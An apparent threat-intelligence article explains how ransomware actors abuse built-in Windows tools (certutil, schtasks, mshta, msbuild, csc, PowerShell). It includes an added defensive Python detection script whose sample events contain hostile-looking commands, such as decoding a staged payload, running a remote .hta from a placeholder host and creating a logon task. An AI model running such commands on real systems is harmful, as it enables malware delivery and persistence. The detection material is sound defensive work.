This month, our focus is on living-off-the-land techniques, and why they help ransomware threat actors execute attacks more stealthily. The concept of living-off-the-land (LotL) was first introduced by researchers to the broader security community in 2013, and has remained popular with threat actors ever since.
Common LotL Techniques
The binaries used in living-off-the-land are sometimes referred to as “LOLbins,” and a GitHub project, LOLBAS, keeps track of many of these binaries and the ways in which they can be used maliciously. I’ll provide a few examples of popular techniques, and how they can be used by ransomware threat actors in the wild.
Certutil (certutil.exe) is traditionally used for handling certificates, including backup, configuration, verification, and displaying their contents. Typically, certutil is employed by ransomware threat actors to download additional tools or stages of the malware.
To further help evade detection by antivirus (AV) software, the threat actor may base64-encode the file they download, and use certutil’s “-decode” flag to base64-decode it. This decoding can be used separately from the download functionality as well. DarkSide, the now-defunct group to whom the Colonial Pipeline attack in 2021 is attributed, has used certutil.exe to drop the ransomware binary onto victim systems.
The scheduled tasks functionality (schtasks.exe) allows system administrators to manage scheduled tasks, including those on both local and remote computers. Primarily, schtasks.exe can be used maliciously to aid in the execution or persistence of ransomware.
For example, the ALPHV and BlackMatter ransomware groups created a scheduled task as part of establishing a persistence mechanism, according to researchers at Cisco Talos. Additionally, at a higher level, a threat actor with access to Active Directory (AD) can modify the Group Policy to create a scheduled task to execute ransomware on all machines across the domain. This allows them to quickly deploy the ransomware, decreasing a defender’s chance of stopping the attack.
In the wild, actors will most likely exploit this functionality as part of phishing, in which a download link or an .HTA attachment containing malicious code is sent to a victim, the victim clicks on it, and mshta.exe executes it.
As part of its BazaCall campaign, the actors behind BazarLoader deployed Microsoft Word documents containing macros that used MSHTA to download the malware. BazarLoader has historically been used to deploy ransomware, including Ryuk and Conti.
Microsoft Build Engine and C# Compiler
Microsoft Build Engine (msbuild.exe) and the C# compiler (csc.exe) are built-in Microsoft tools for building applications. Visual Studio uses csc.exe and msbuild.exe as parts of its build process; the “project files” (such as .csproj, .vbproj, and .vcxproj) contain MSBuild XML code that executes when the build process starts and the code is compiled.
Threat actors can use these tools maliciously as well, primarily to aid in execution of code. For example, if a threat actor drops a malicious C# code file which may evade AV while the compiled version would not, they can use csc.exe to compile the code, and later run it by some other means. Or, using msbuild.exe, the threat actor can build and execute malicious code stored as a C# project in a .csproj project file.
In 2021, researchers at Anomali observed threat actors using MSBuild to deliver Remcos RAT and Redline Stealer. Redline Stealer is a popular credential stealer whose logs can be used by threat actors to gain or increase access to victim systems, prior to deploying ransomware.
Similarly, the actors behind WastedLocker used the C# compiler when delivering payloads to other systems in the compromised victim network.
PowerShell, the built-in Windows command line and scripting tool, is a LOLbin that truly deserves its own category. PowerShell offers substantial capabilities to ransomware threat actors, including downloading additional tools, deobfuscating and executing payloads—even functioning as the programming language used to develop the ransomware itself.
One of the more interesting aspects of malicious PowerShell is its usage by pre-ransomware tools, including SharpHound, Cobalt Strike, and Empire, to name a few.
- SharpHound is an AD enumeration tool that allows threat actors to look for a route to elevated privileges on an AD domain they have compromised; in addition to a C# payload, a PowerShell version of the tool can also be used to collect this information.
- Cobalt Strike, the extremely popular post-exploitation tool used by ransomware and state-sponsored actors alike, allows threat actors to deploy a PowerShell payload to a victim system. This payload is executed in memory, rather than dropped to the disk, making detection somewhat more complicated for defenders.
- Empire is another multi-functional post-exploitation tool that, among other functionalities, allows a threat actor to execute PowerShell commands.
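For defenders, the techniques described above can be turned into a first-pass triage over process-creation telemetry. The following is an added example, not code from the original article or from any project it names: the rule names, the parent-process baselines and the sample events are all constructed assumptions, and the events are not real telemetry.

```python
import ntpath
import re

# Assumed baselines; tune both sets to what is normal in your environment.
DEV_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
URL = re.compile(r"https?://", re.I)
DECODE = re.compile(r"[-/]decode\b", re.I)
CREATE = re.compile(r"/create\b", re.I)

# (rule id, process image, predicate over command line and parent image name)
RULES = [
    ("certutil_decode", "certutil.exe", lambda cmd, parent: bool(DECODE.search(cmd))),
    ("certutil_url", "certutil.exe", lambda cmd, parent: bool(URL.search(cmd))),
    ("schtasks_create", "schtasks.exe", lambda cmd, parent: bool(CREATE.search(cmd))),
    ("mshta_url", "mshta.exe", lambda cmd, parent: bool(URL.search(cmd))),
    ("mshta_from_office", "mshta.exe", lambda cmd, parent: parent in OFFICE_PARENTS),
    ("build_tool_odd_parent", "msbuild.exe", lambda cmd, parent: parent not in DEV_PARENTS),
    ("build_tool_odd_parent", "csc.exe", lambda cmd, parent: parent not in DEV_PARENTS),
    ("powershell_url", "powershell.exe", lambda cmd, parent: bool(URL.search(cmd))),
]

def detect(image, parent, cmdline):
    """Return the sorted rule ids matching one process-creation event."""
    exe, par = ntpath.basename(image).lower(), ntpath.basename(parent).lower()
    return sorted({rid for rid, img, pred in RULES if img == exe and pred(cmdline, par)})

# Constructed process-creation events (image, parent, command line); not real telemetry.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\certutil.exe", r"C:\Windows\System32\cmd.exe",
     r"certutil -decode C:\Users\Public\stage.b64 C:\Users\Public\stage.bin"),
    (r"C:\Windows\System32\certutil.exe", r"C:\Windows\System32\cmd.exe",
     r"certutil -verify C:\certs\server.cer"),
    (r"C:\Windows\System32\mshta.exe", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "mshta https://files.example.test/invoice.hta"),
    (r"C:\Windows\System32\schtasks.exe", r"C:\Windows\System32\cmd.exe",
     r"schtasks /create /tn ExampleTask /tr C:\ProgramData\example.exe /sc onlogon"),
    (r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe", r"C:\Windows\explorer.exe",
     r"MSBuild.exe C:\Users\Public\project.csproj"),
    (r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     r"C:\Program Files\Microsoft Visual Studio\Common7\IDE\devenv.exe", r"MSBuild.exe app.csproj"),
]

def scan(events=SAMPLE_EVENTS):
    """Return (image name, rule ids) for every event with at least one hit."""
    hits = [(ntpath.basename(e[0]).lower(), detect(*e)) for e in events]
    return [h for h in hits if h[1]]

if __name__ == "__main__":
    for exe, rules in scan():
        print(exe, rules)
```

Rules such as schtasks_create and build_tool_odd_parent also fire on legitimate administration and developer activity, so they are best used to rank events for review against a per-host baseline rather than as standalone alerts.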
The Future of LotL
Ransomware threat actors will very likely continue to use LotL techniques, like those discussed here, as part of their attacks on victim networks. The specific groups employing them will change as threat actors shift to new operations, but as the techniques remain successful, threat actors will continue to use them.
While this discussion focused on the usage of benign Windows tools, the definition can be more broadly applied to any application or utility that a threat actor did not explicitly develop but can use to conduct malicious behavior. A few examples include third-party administrative software that can be used to drop additional tools, abusing collaboration apps for C2 or delivery, or employing benign compression utilities to encrypt victims’ data. As a result, we’re likely to see additional legitimate tools used, or other tools used in new ways, to enable threat actors’ malicious goals.